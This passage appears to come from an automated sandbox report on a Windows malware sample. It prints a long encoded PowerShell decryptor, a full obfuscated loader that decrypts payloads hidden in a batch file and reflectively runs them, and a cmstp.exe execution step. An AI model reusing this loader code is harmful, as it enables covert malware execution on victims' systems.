QBkAHIAQQBVAHoAQgArAEUAeQBxAGUAUAB6AEUAbABNAHgAVQBoAGMAVAByAHQAeQBNADQATgA4AFUAVABpAGMASABQADAAdgBLADIALwBkAG8ARQBwADkAcgBvAEsARgBUAG4ARwAyAEoAcABMAEgAegBIAG4AbAArAEcALwA3AGcAZABXADUAVwBKAHQAaAB0AEkARABNAG4ASQA0AFIARQA3AGIAagB5AC8AZQBUADAAbgBFAHcAeABpAEMATwBrAFkAVgBwAFoATABxAFgASgB5AFcAMABXAEEAcwB1AGcAeQBjAEwAdgBXAEsAQQBZADcANQB1AEUASwA2AG4AQgBIAE0ATgA1AG8AQQBjADMAYgBYAEcAcwBFAFoARABGAEEARQBIAC8ARwBpAE8AcwA1AGEAYwBnAEMAWgBvAE8AWQBNAGUAcQBJAEcAUgBOAEwAegBzADAAegBxAEgAVABwAGMASgB6AHMAZABNAEUAUABiADkAZQB4AHgAdgB2AFAARgBuAFgARABHAGcAMwBHAEwAZQBpAFcAVQBkAHAASQA2AGEAKwBQAGwANABzADUAawBuAEYAcQBQAEUAaQA2AGIAOQAzAEYAcgBNAFcASQB0AEQAQgBPAHAATgB2ADYAQQB5AGgAaQB4AEEAbQBxAFQAYgBkACsAMQBuAGoALwBHAGwAOQBjAEUAYQBCAEgASQBQAEgAVwBTAFkATABJAFgARQBGAHYAVgBjAFMANQBaAHMAeABsAG0AVQB6AGMAWQBHAE8AUgB6AEIANgBUAGsAMgBGAFgATQB2AE4AagB2ADcAUAAyAEUAeABLADgAMwBXAGUAMQBQAFoAMgBrAFAAdgBWAGYAWQArADYAegBmAGEARABiAHIAOQBLAHYAVgBuAHQARwA5AFgARwBGAHYAUAA5AFYATQAzAGYANQBaAGUAWgBGAE0AawBGAHcAdABjADYAbgBVAE0AVABoAEgAYQBQAEoAcQBmAEUAawA5AHUAdQBwACsAZgBIAFMAQwAyADgAZQBHAGsANQA0AEsARABtAFUAUQBxAFYAcQBEAEcAMQBJACsANgBsAFQAawBDAGUAYwBHAE0ASwB1AFYAMQBKAGUAUgBSADEAdwBnAEcAWQBSAGoARgBvAHoAUgBvAGUAeQByAFgAagBxAGMAKwAzAFQATgBWAEMAZwB1AC8AMgBPADMAbQA5AGwAOAByAEYAMgBvAGUAUgBkAEkAVgA5AEgAdQA2AEQAeQAwAHoAYwBwAEIAZQBDAG4AMwBqAFIAaABEAHoANABXAG0AUgA5ADUATQBEAEYAOQBEAHkAYQB2AEwAZgB2ADkARwBhAEMAQQA4AEgAUgBrAEsASAB4AEYAcgByAHUAbwBCAHEASABwAFUAdgBMAGUARgA5AE4ANgBiAGcAVABJADgAdABMAFQAWQBiADcAaABPAG8AMgBhAHgARgBQADMAUABTAE4AcABXAFUAeAAvAEkASwBJAHgAagBxAGoAaAB2AGUAMABoAHgAVQBJAGUAeQAvADUAVgA0AC8ARQBBAEwAcQB5AHgASQBHAGUAKwAwADIANwAvAEgAMQBtADkAaQBXADcAaAA5AFMASAAyACsAbwBzAGIAdwBPAHYAeQBhAEcAUwBxAFAASQBJAEIAMwAxADUASABVAG4AMwBrAE0AQgBQAGcASQBIAGgAOQBHADMARgBPAC8AWABKAE8AZwBJAGUAWABYADkAUwB0AGcAbwBIAGIAawBoADYARgBUAFoAYwB5AFMAVwA0AFkAdwBMADcAVwBjAEkAVQB6AGgAUAAzAE4AdwBvAEUAVwBVAEcAcgArAHQAZgBqAHAAUgArAE4AQgBmAEYAVgA2AEQAMgAyAFUAZwBCADUAMAAyAFMAQgBvADkAYwBNAEwAUQAvAHEALwBFAE0AUwBSAGgAZgBjAE4ANwBCAHEASwB5AG0AawBZAGUAUwBQAFEAUgByAHQANABUADEAVwBzADMAdQBvAE8AbgB0AHcAYgAwADYAYwBzADgAMwBQAFkANAA3AFAAMAB4AEsAUAB0AGUATgBjADIAdwA0AFoAeABjAGwAOABvAGQASABWADQAMQA4AGoAVwBPAHcAYgB6AGMAdwBTAE4AQgB4AEsAUgBTAFAAWgA1AEkAVQBjAFYAUgBNAGIAMABMAGcAVwBRAFIASgBnADcAdQBkADcAYgBrAFMAOQA3AEsAVABXAFAATwAvAFkANwBCAG8ASwBVAHEAUAA2AFUATABxAFIAZQBCADQAWAArADUALwA5AHUAZgBoAEkAcgB5AGEAZwB5AHoANgBKAEQAeABDAG4AUAAxAFkARgBrAHUATgBqAFIAbwAwAHYAegBVAFcAaAB6AHAAcgB1AHcAdgBXADQAMgAyAGoATAB1AG8AOABCAFUATwBzAGsAUQBCAHkARQB1AG0AbwBqAFoAVgAyADIAVgBDAHIAcABoAG0AdgBaAEgAZQB2ADEARQA2ADIAegBaACsAdQBDAFYASABzAFQATwBFAE8AVABXADcAQgB4AGUAMQBOAC8ATgBFAFEASwBHAE4AbABlAEUAcgBwADkAdQArAEoAWgBwAHcAdQA3ADAASgBRADIAcgBKADQAUAB2AEsASQBoAEgAVABtADEATwB4AEoATgB5ADMANgBHAEUAcQBqAHkAZQBFAEoAOQBZAHUAUwA4ADAAdABvAHcAQwBVAE0AWgBjAGMAQQBlAGgAMQBaAFQAaQA3AHUAawBwAGoAZQBMAHMAVwA1ADQAbwBGAGwAMwA0AEgAMgBLAEQATQBEAEYAMAB0AE4AbQBnAFIATgBsAGIAeABCAEgAVQAwADYANAA4AG0ANgBYAHQANwB0ADgAdgA2AHoAaAB5AEUAUgA5AEkAUgBqAFkAbgBwAHIAdQBTADcARQByAHMALwBJAGIAZgAyAGUAZwBqAEcAMABaACsAbQBiAFUAWQBjAEkANgB5AHgAZQBvAFEANwBHAFAAdwBWAE0AQgAyADAALwBRADQATgBsAGYAawBqAEMARABYAGcATABwADAARABLAGwAMgBPACsAbQBmAGYAcwBmAEwAQwBHAFIAbQB4AEwAMABpAGcAZABGAEEAYQBYAGUAWgBuAEIAUwBHAHgAcQBVAEsALwBEAFYAUgB3ADcAcAAwAGUAaAA0AGcARgBDAFIAOABwAE8AeQBpAFIAeQBQADMAUwBNAEIAagBOAGYAWQBtAGQAdgBBAFMAVQBpADEAMAB6ADEAWgB2ADQANABOAGoATABtADMAZABNAGQAZgA1ADUAQQB1AGEAMgBhADEATwBaAGMASABiADkARwBvAFAAYgBmAGYAVwB6ADMASgB1ADUAZwBFAFQASABuAFQAcQBMAG8AbwBUAFQAbABMAEEANABYAGQAdQBoAFcASQBVAHkAbABaAGkARwBCAGoAUwB0AHAAUgB2AE8AMwBiAC8ATgBMAHIARwA2ACsANgBNAEgAVwB1AEEAVAB1AEoAZABHAFQAagAzAC8AZgAwAHUARAAxAGMAVQBrAGEAdABsAHMATABxAGEAbgBrAEoAeQBkAHUAMgBVAFoARQBGAE0AVwAxAHUARwBRAHUARQBOAEUASwBYAHgATwBGAC8AZQBBAHMALwBGAGMAVgBUAFYARABFAFcAOQBhAHYAUwB5ADIAcwBwAG4AeABVAFgANwBJADgAYQBWAHgARgBqAHUAagBmAEYAWQBrAG4AdgBjAFcATQBYAFMANABJAEMAVwBuAGoAagB0AG4AbQBoAGoAbAA4AGQAZgBqAHAAdgA2AHEASwBZADMATAAvAEwAbwBCAFQANQBlAGYAegBpAGcAZAArAGkAdABaAGkAZQBsAHUAcgBkAEQAcgB5AFIAZwBlAEwAZABqADMAdwB6AE4AegBWADcAQwBjAGcAaABGADMAMQBwAGgARABIAFcAYgA0AEYARABWAFgAVwBqAG8AZgBVAEwAZABEAHQATQB6AHAALwBZAGgASwBoAFcAUABxAHYAQQA5AEUAegBmAGcAYwBtAG4AVQBlAGoANwAvACsAOABxADYAOAA5AGkAdQBJAGYAWAB5AEwAMABzADIASwA5AG0AdgBXAFEAVgBqAEUAQwBpAE0AegAvAE8AKwBGAFgALwBqAG8ARgBEAGYAbAB0AHkAdgBsADAAaQBJAHoAbQBnADEAVQA5AE8ASgBzAHUAUwB5AGoAdQBqAHMAYwA2AGUAWABLADkAaQBUAGgASABzAEoAMwBrAE4AWQAzAFYAUQBDAEwASwA2AEEANQBPAGkATQA4AEUAYgBDAG8AagBaAHkAYwBYAEcAUgBQAE0AcwBnAFQANAB6AEMAcgBrAEcAKwBwAG4AVgBPADYAMABrAGMARQBqAEMANwByAFYAegBTAGQATgBSAGIAKwBhAEoANwBwADEAQQBnACsAUABaAFoAZwA2AFgAKwAxAFQAbQAzAEEAYgBYAHoAZQBFAGYAaQBMADQAQgBxAG4AYwBZAEYAQgBnAHAAQQBMAFYAbABzADQAQgBIAHYAdgBuAGsAUQBBAEUAaAA2AHQAawBPAHcARgBjAGcARgBIAEIASwBKADAAUwB1AHcAUQBkAEIAMgBuAEQAMABXAG4ASQArAEkAagBJADMAQQBTAHYAaAB5AE8AawBvACsAYwBCADEAawBIADAAZQB0ADQAZgBKAGQAZABLADYAMQB6AGEAcAB2AEcAbgBYAEEAZwB6AGwAQwBEAFQAbABrAEYAcwBaAFkASQBKAFoAbAAyAE0AdQBrAEkAUwBCACsAcABZAGYAeABXAHcAdAAvAFYARABZAEsAcgBNAFcAUwAvAEwASwBtAHAAdwBEAGUAMAArAE0ATwAxADEATQBXAC8AWQBOAGcATwB5AEYARgBUAEwAUAByAHcAeABOAEIAMwBpAEYAYgBPAGEAMABqAG8AOQBuAHAAdgB2ADcATwBMAFkAUwBXAEkAcgAxAG4AaQBIAHkAMABGAEMAMwB5AGoAcABoAGIAcgA4AGoAcgBhAEsAZABCAHgAZwBvAEUARAAyAE8AcwBaAFMARABHAHMAawBjAGYAeQBIAE4AUABPAE8ANQBjADEANwBkADAAZwA4AEYARgBYAFkAcwBRADUAZABaAGgATQBBADkANABLAFcAOAA4AEMAQwBZAGcAQQA5AEkASgBlAG4ATwAzAEwASABOAFgASwBEAEsAYgAzAGUATABSAHUAZwBDADAATAA0AHgAeQA5AEwARgBKAFQAMgAvAFgAdwBTAHAANQBNADkAZQBlAG0ANwBxAEYANwBvAFIAYwBtAEsAYwBrAGoAQwBJAEIAbwBoAHcAQQBsAHMAdgB1AE0AVwA3AFAASwAyAFQAeQAwAEIAUABVADMAbwBIAG0AaQB0AG8AbAAzADYAMQBiAFEARgBiAFkAawBOAEcAQwBSAEYANABxAFMAdQBUAGEAKwBxADEAMQBmAGMAeAAwAGQASABBAFAANABlAFIASgB5AFUAawA1AHMAYQBnAFAAagBPAFQAcQBxAHYAbgBQAEEAbwBrAHEAMgBaAFUATwBtACsAdgA1AGUAeABqAGwAdQBnAG0AUgBQADgAeABEAFcAOQByAEkAMgBWAGsAKwBZADYAUgBBACsAVABUAFcAbgBGAFMASwBHAG4AZwBnAEIARQBaAHUAeQBiAGYAQQBCAG4AWgBHAEIAOABIAHIAVQBhAHEAdQBZAC8AbgBCAEQARwAyAGMAWQByAC8AUgAvAEQAdQBaAEEAaQBuAFQAdABNAEQARQBtAC8ATgBDADMATwA5AEQALwBqAFIAUABwAE8AcgA0AC8AMAByAHQARgBvAG4ANgBxAFUASwBZAFcAaAB3AHgATAAvAFoANwBlADkAawByAGIAcABVAGIAeQBPAHQAUQBpAGkAUABYADMAYgBmAHQAVQBkAHoAMwBzAFcAQgBPAGMAWgBJAGgAUQA1AGsAagBXAGcAawAwADgAdQBNAFIAYQBQAFEANQBoAGgATQA2AGcAcQAzAE0AbgBRAEcAYwBXAE0AVABZAFMAWABqAEMAZwBvAGQAMgBWAHIARABEAEYAQwBlAGMASQBuAEIAdgB0AGQAVwBzAHEAUgBFAFUAKwBZADEAMAB4AEwAOAByAGkAagBqAFQAQQBpAHkATwB5AGoAOABBAHcANABmAEkAcQArAGoAZQBKAGsAMQAwAHYAZgB4AG8AMgBtAGoAOABaADMAYgBUAEkAdgB5AEwAMABMADIAUQAwAFcAegBaAFgAawA5AGkAdwBHAGYATABUAHIASwAwAEoASABGAFAAdgBEAHMATAA2AGIARQByAE4AawA1ADgAOABvAHQANQBFADIASAB0AE8AcgBhADYAMABCAFcANwAzADkAMwAvAFoAawB2AHAAQgByAGsANABxADAAdQBYAGIANwBVADIAMQAxAEgARQBYAEwATgBPAFgAMwBlAGwAbwByAGsAOQBYAEUAbgBBAFgAVgBKAFMANgBrAGoAbABXADIAbgA3ADYAVwBtAEMASwB4ACsAZABWAEwARgBRAFUATgBSAHYAWAArAE0ARwBLAFMAcAAzADcARwBCAHEANAA0AE4AaQByAEwAMgBIAG8AaQBxAE8AKwBGAGwAVQB1AGgAdwB6ADEAMwBGAGoATAA2AHAAdwBrAFYAYwBpADgAcwBCAFAAVgBiAEoANwBYAHQATAA4AGUARABjAE4AZgBnAEYARgB3AE4AbgAyAHIATgBwAEMANgBWAEgAbABwAE0AaAB2AE8AYwBmAHQASQBYAEYATQBwAHcARAA5AEoAbgBRADIAbgBtAGYANAArADAAYQBjACsASwAwAE0ALwBOAEwAMABOAHAAawBVAC8AUQAvAHUAWgBRADUAbABRAE4AZABzACsAaABVAHQAQgBMAEkAVwBiAC8AZwBXADkAYgBnAGUAUABKAEYAagBhAHAAUwBaAGUAcgBMAHkARAA3AEcAeAA3AEMASQBkAEMARABHAGsATQBmAFMAaABoAFAAcgBuADEAaQBsAE8AeABKAFMARAA2AFcATwB4AFoASgA2AHkAZwBPAGQAOABRADkAVQBtAFgAbgBiAFIAMgArAEcALwBDAGQAVwB4AFYARwBXAGEAMQBqAGMAdABOAEkAWAA4AE8AUQBOAHMAbwBQAG4AdQBSAHQAVQAzAGkASABLADUAZQA2AFAAVABYAC8AdQBwACsAeABYAHYARgBwADMASQBVADQAZABCAG4AUQByAFUAZwBpADkAaQBrAG4AZQBKAGEANwBhAG8AcABQAEYANgBYAHgAVwBCADAARwBGAEwAcABYAGQASABhADcAYQBiAE8AVwA0AGIAcwB3ADgAUABYAHgAeQBrAG8AegBFAE0AbQBuAHQAUgBOAHkAcwBIAGIAbgBqAFoAcABwADEARgByAFYAeQBiAFoAaABnAFAAYwB0ADUAZABpAGIANABBAGgANABqAG4AbgBEADAAaABvAGIAawBpADYANwBqADMAUwBrAEcAWQBEADkAZABNAEoATAA3ADgAUgBqAC8ATQBlAGEAMAB0AGUASABBADQAcgBzADMAWgAzAHMALwB1ACsATgBLAEsAcgBWADcAQQBBAGMAeAA1AFgASABEAFUAWgBTAC8AUQB5ADYASwBWAHIAcgBsAGYATAByAHAAeQBhAE0AMQBCAE0AUQBvADIARAA1AEgASQBIAHMANAAzADYAZQA2AFEAYQBpADEANAA1AFcASgBBADgAeABMAGwAVwBrAEUATABHAC8ANABGAHQASABZAEoAVwByAGQAWQB2ADYANwBJADQANABMADkAZABTADgAcwA2AHgAcgBHAFgANgBNAE4AdgBTAHEATgA2AE8ARgBIAFEAQgB3AFAANABrAGoAMgBTAGUAaQBSAGIAWQBpAFAAaAA5AGcAUgBiAHoAaQB6AFYAcQBZAFoAYwBKAHEAMwBWAGgAegBGAGgAeQB5ADYANgBRAG4AQwBCAFEAbwBmAE0AQQBRAEMAagBSAE0ATgBjAGIAdgA2AGQAVABQAEQASgB2AGoAawBwADEAZwBVADgANgBHAGwAVgBVADUAVAB1ADYATgBOAGwAOAB6AEcAdwBUAGIAaQBlAEgATQBJAC8AUgBXAGUAWgBNAGgAawBpAG0AbgBGAE4AbwBvAEIAQgBQADYAYQB5AEIASwB5AHYAZwBDAE0AZABkAE0AUgBJAFMAdwBpAEcAQQBVAEYAeQBPADgAZQBBAEMAcABYAGkAQwA0AGQAWgBFADMAZABYADcAUABhAFMAcQBkAHUAMwAzAFUAKwBIADQAOABLAEsARQBsAFkATgBKAEEAMQA4AGUARQBoAEUANgBlAGgAYwB4AEoAeQBLADQAbABKADkAMwBSAEEAYgBmAE8AZwBWAEkAdwBqAFgATQB2AEoAdgBnAGUAYgBiAHoAMABXAFAARgBrAHYAeQA3AHYAbwA4AHcAbABSAHMAVQBXADQAMQBWAE8AcQA2AHMAaABHAHQAUAAyAFIATwBsAGcANwAzAFIAOQBOAEQAVgA5AFcAdABtACsAbgBQAGcAbwBiAHIAegBqADIARwBJAE8ARwBrAGUAVABhAGYAUgBsAFUARgBhACsAMwBvADUAQQA4AEsAMQBMACsAYQBuADAAcgBBAEsAQQBNAGoARwBsAEgAagBFAHMARgBzAEQASgBrAEYARABzADcAYQBBAEQAbABDAFgAbABLADIASQBaAE8ASABLAGEAZABvAEIAMwBvAFMARAA2AEIAUgBsAFkAZgBxADMATABSAC8ANABhADgAQwA0AGEARABVAFkATgAwAFMAbAB2AHEAZQBkAHcAawB6AG0AMQBDADQAegBsAG8AWgBJAGoAUgA2AHQAZwBJAFMAVgB5AFkAbQArAHQAeQBFAEMAUQBJAE0AWABlAGIASABSAEcAYQBWAE4AeABLAC8AeAA3ADUAawBEADkAUwBvAEgAdQBTAC8AVgBIAEsAQwBKAFkAYgBkAEYAMQA1AHoAZQBsAEkAeABkAFUAegBiAG8AcgBtADgANQAzAFIAMABRAEEATABkAGIANwA2AC8AcgAxAG8ARQB4AHkASgBFAEIAaABXADgAMgBEAHAATwBpADkAcQAvAGMAcQBkAG4ALwBkAHUARABuAGoAVAA2AEMAcwBXADcAdQBYAFIAYgBXAEgAWgBvAHgARABzAGEANABvAEEAQwBIAEsAcwBrAFcAaAAyAGYAYQB1AFIASABnAE0AVQBsAFIANQBXAHMALwAvAHMAMgBRAFIAQgBpADcASwB2AHcAYQBFAEYAUgBMADUAUQBuAHMASwBUAGQARABhAHEANwB2AGYAdgBUAFIAMABKAE0ANwAyADUAdAB2AGUAVwBQAEEARABEAGgASQBBAFYANQArAEEAegByAHkARABsADUAVwB6AEwATgB5AHgAYwBGAE4AcgBBAEwAOAB0AEEASABaAFIANwBTACsAeABzAHoAagBJAE0AUQBhAFMAdABKADIAdgBPAEwAOAAwAFgAMAA1AGkAOABuAE4AVwBYAHIALwBRAHUANAB1ADMANwB6AEwAUQBuAGEAOQBMAEIAZQBPADAASABKAG0AZwBJAHgAdgBrAEgANgA2AFIAWAA1AEIATABMAGUAcQAzAFkARQBhAFkAcABYAFUAKwBWAEIAMgBXAEsASgBPAEUAUABNADkAYgBVAFoAMwBPAHYAMQBkAGYAQwBhAGwANwBkAG0AMABKAHcAUABjAFYAWAAzAGIARwBFAE4AVwByAFYAUwByAFUAUQBPAFIAQQB5ADAAWABkADIAVwBIAEgALwBlAEgAWgAxAHIATQBHAGYAWQBRAGEAKwB5AGMAdwBUADUAMgBSADIAZwBVADcANgBwAE0ANABuAFUAMAA3AEsARgBjADYAaABOAHgAMABWAGIATAA4AEYAMQBNAFYAbAB4AGwARABhAE8AaQAvAGUAZQBMAFkAMwA4AFMAOABkACsAawB1ADIASgBZAEMALwA5AE0ATQBNAG8AVQBLAHAATQAxAEkARgBDAGgATQBzAFAAcgA5AEkAYgBQAFYARABNAEsANQBCAEEAMAAvAEgAdgA3AGQARwBwADgAUABsAHEAQgBYADkAbwBSAGoATQBwAE8AWABEAEYARABLADkAKwBvAHkAaQA3AE4AMQBXAGUASgBYAE0AWQBaAHcAUgBjAEYAeABtAFMAWgBGAGgAdQBFAG8ARgB5AHgASwBxAEkAMwBoAGYAKwA4AGQAWQAwAEsAWgBBAHEAQwBxAC8AagBKAFkAQwBXAE0AUwBqAEcAWgBRAEkAaABKAHIAOQByAGEARABFAGkATAB0AGwAcgBUAGgAVwAwAG8AYQAyAHEAQQBtAC8AcwB4AHEAbABzAG8AQwBpAGoAZQBBADIAeABTAE4AawBkAGoARAB0AE8ARAA5ADIANABuAE0AQgBOADQATQBQAFUAVwAwAEoAVgAvAHkAawBhAHoAcwBGAG0AdABlAGoAQQBBADMAWgBsAEIAawBPADQAdABOAHAASgBEAGsAaABwADAAMAB1AEUARAAxAEMALwBWAHMAZwBhADkAcQBqAEsAUABVAGQATgBsAHkAeQBqAEEAQgBOAFgAUABXAHQAMgBPAFIAZwA1AFoATQBUAFQATQA2AE0AUwBtADIATwBWAGIATgAvAFoAeQBUAE4AYQBvAGMARgBaAFgAQwBRAGgANQB5AFoAegBxAG4AeABLAE8AdgB1AGUAZwBNAGYAbABaAHQAWgAwAG4AQwBWAE4ATABRAGEAaABxAGsAQwA3AFMAcABrADcAWgB2AG8AaQBtAEsASABkAFQAdAB5AHYAUABsAGQAWAArAFUASwAyADEAcQA4AGIAbABJAGIANgBPAGUAYgBvAEoAMQBrAFAAMQBoAEUATQBaAEQANQA5AGIAZQBzAEgAMwB5AGIAVABFAGkAbgA5AHEANgAxAE8AVgA0ADEALwB4AGQATQA5AFEAawBkAGEAMgBmAG4AZQBCAGMAQgBEADUAQQAxAHMAVgBoAHYATQBLAHQAWQBOAG4AaABHAGoAcQB1AG8AbgBGAFEAcQB4AHAAUgBxAFIAZwAyAGEASABYAE0AUgB5AHcAbwAzADEATQBzAGwAWgBaAFIASABBAHYAMABEAHIAYwB3AGQARAByAGYAOABDADYAWABEAEgAMQBQAHcAWgBVAFMARwA3AEkAMgBTAHIAcQBBAGsAUwBFAE8ASgBPAGUASQBUAGUANABYAEoAOQBwAGcAUQBxAEMAdAB4AEMAMgBkAGUARABqAHUASQBaADkAMQBRAGQAbQBkAGgAMwArAFYASgAzAHkAKwBVADIAdQBJADgASwBPADgAMABYAEsAMgBRAFgAeABrAG0ASABIAG8ARgB1AGsANAAzAG8AdABTAEgARwBKAFgAQwA1AFoAZwBaAHYAcgA5AHkAYwArAGIARQBqAFYATwB3AFcARwBKAEcAUgBDAGIAaQBvAEUAbAAzAHcAegA4AGIAUwA4AEIATABrAHYARwBpADUAZwBHAGYAbQBMADkAbAB3AHoAUgBJAEwAVwBZAE8AbQA1AHUARwBXAHQANgBJAHoAKwBnAHcAMQArAFIAUABlADYASQBtAHgAVQBkAHcAZwBCAGcAVABoAEsAZABOADIAWQBGAEwAUgBhAGsAcgBQADcAdABEAGMANQA1AFMAbABFAHkAZABWADAAbwBaAEEAUABYADEAdABtAHAAdgB5AEIANgA0AHcATwBuADcAMABKAEUANABiAEkAQQBuADMATgBuAFgAZwBVAFcAQgBaAFIASwBjADYAbAByAHAAeABZAEwAMgA3AHkAaQBvAEYALwBPAGYAMQBIAEgAUAB0AHkAcgBWAEIANAAvAHIAZgB1AC8AUgAzAFIAMgByAGYARAAvAFQATQBvACsARgB3AFgAaABYAFMARwBqAHkATABuADcAKwBxAFcAdABaAGcAQwBJAHgAUQBIAFkAbwBiAGUAUgBDAHIAQwBBAFUAZwB4AHEAZgBJAGUAegBPAEgASQA4AGEAeABKAHMAUgBtAHQASgArAGYAMgAyAHEAMQBPAGIAagBvAFYAbABDAG8ATwA3AEgAZgBLAE0AdgBwAGkAMABaAEMAbwBzAGQANQBtAFgAKwB1AGgAbABGAGYAQwBKAFMALwBkAFYAeQBOADgAawBLACsARgAxAHAAMgBzAEcAcABCADMAWgBrAEIAYgB0AGwAWAA3AG4AeQBJAGcAQgBaAFgANgBEAEYAcgBmAEwAUQA4AFMANQA4AE0AZwBaAGsAWgBTADQAYgAwADEAOABFADQAZwA5AEMAeQByAEMAVQBvAGIAMwBhAHUAQgBMAG8AQQB5AHYANAB0AEQAWQBPAGsAOABnAGsASwB6AFUAZgA0AHQAdQBtAEUAcQByAHAAWQB4ADQAbABPAGIAdQB6AHUAMgBEAEEAOABBAG8ALwBwAEMAVwArADYAUQBaAGEAaABiAG4AUwBDAGIANABhADAAVwBVAG4AYgBJAE0AVQBlAEoAZABKAEkAeAA1AFcAOAB0ACsATQBUAHQASAB1AHUASABpAFIAawA4AGIAbwBDAEEATwBtADUAdgBXAGsATgB1AGwAeABxAC8ALwBkAFQAZgBSAFAAZwBGAEUAVQBQAHgANQBGAGgAegBKAE0AcwB1AGMAYgBhAEwANQArAFQAdABkAGwATgBxAFgAZAArAFcAMgBsAGQAUAAxADUAbwArADgAZQA0ADkATwB1ADAASwA5AG0ARwBaAHQAVwBhADcASAAwAHEAeABEAGwAMgBkAEMAZABPADgARQBBAFMATQBIAEsARABBAFUAZwA3ADkARwBNAG0AMwArAGMAVwArAHYATgBRAHoAQgBDAHcANAAwADQAWgBQADYAeQA3ADYAYwBHAGwANABrAE4AcgBHAHkAaQBrAFAANwBhACIAKQANAAoAIAAgACAAIAAkAGkAIAA9ACAAJABkAFsAMAAuAC4AMQA1AF0ADQAKACAAIAAgACAAJABlACAAPQAgACQAZABbADEANgAuAC4AKAAkAGQALgBMAGUAbgBnAHQAaAAgAC0AIAAxACkAXQANAAoAIAAgACAAIAAkAGEAZQBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMATQBhAG4AYQBnAGUAZAANAAoAIAAgACAAIAAkAGEAZQBzAC4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAA0ACgAgACAAIAAgACQAYQBlAHMALgBLAGUAeQAgAD0AIAAkAGEADQAKACAAIAAgACAAJABhAGUAcwAuAEkAVgAgAD0AIAAkAGkADQAKACAAIAAgACAAJABkAGUAYwAgAD0AIAAkAGEAZQBzAC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAApAA0ACgAgACAAIAAgACQAbwB1AHQAIAA9ACAAJABkAGUAYwAuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAGUALAAgADAALAAgACQAZQAuAEwAZQBuAGcAdABoACkADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABvAHUAdAApAA0ACgAgACAAIAAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAcgBlAHMADQAKAA== -inputFormat xml -outputFormat text
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3064
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mtxs4qav\mtxs4qav.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4044
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES356.tmp" "c:\Users\Admin\AppData\Local\Temp\mtxs4qav\CSC14955CEFC1A24FF985C145702B55CC.TMP"
        5⤵
        
        PID:4104
  - - C:\windows\system32\cmstp.exe
      "C:\windows\system32\cmstp.exe" /au C:\windows\temp\oqwqvgfx.inf
      4⤵
      PID:3520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2548
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DK2yqtn/8WWLFGdN0SGSXoqb0xwC458hY3mEb0Z8Op4='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Tn8+JuQ0zcIx9j+6ZeLoqQ=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:436
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
